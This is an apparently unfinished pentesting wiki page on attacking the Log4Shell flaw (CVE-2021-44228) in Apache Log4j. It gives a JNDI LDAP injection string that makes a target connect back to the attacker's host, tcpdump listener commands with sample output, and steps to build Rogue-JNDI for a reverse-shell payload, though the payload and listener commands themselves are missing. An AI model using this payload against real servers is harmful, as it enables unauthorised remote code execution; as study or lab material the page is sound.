search

CVE - Log4Shell (WIP)

Is a critical vulnerability now reported as CVE-2021-44228arrow-up-right discovered in the Apache Log4j library, widely used for logging in Java-based applications. It allows attackers to execute arbitrary code on a server by injecting a malicious payload into a log message.

Here we can find a way to do an attack on a target affected by this vulnerability:

  • Send a payload to confirm the server is connecting back

# Insert this payload on the vulnerable point
${jndi:ldap://$IP/test} # Specify your IP

# Set TCP listener on our machine
sudo tcpdump -i $interface port $LDAPport # Specify the Network Interface you are using and the port running LDAP which by default is 389

# If it works, we will see a result like this
01:02:56.775423 IP $TargetIP.48214 > $OurIP.ldap: Flags [S], seq 1793598680, win 64240, options [mss 1340,sackOK,TS val 2750652936 ecr 0,nop,wscale 7], length 0
01:02:56.775456 IP $OurIP.ldap > $TargetIP.48214: Flags [R.], seq 0, ack 1793598681, win 0, length 0

  • Install necessary Java tools to generate a payload

sudo apt install maven
sudo apt install openjdk-24-jdk

  • Download and build the Rogue-JNDI Java application

git clone https://github.com/veracode-research/rogue-jndi
cd 
mvn package

  • Create a payload to use

circle-info

This example is done with a reverse shell but could be any command desired for the RCE, and we encode the payload to avoid issues with Rogue-JNDI

  • Start the Rogue-JNDI application while passing in the payload

  • (Optional) Set up a Netcat listener

circle-info

This is done working with the example of the reverse shell

  • Access to the created payload using the vulnerable point

PreviousWordPress - Getting credentials from configuration files (WIP)NextCVE - Shellshock (WIP)

Last updated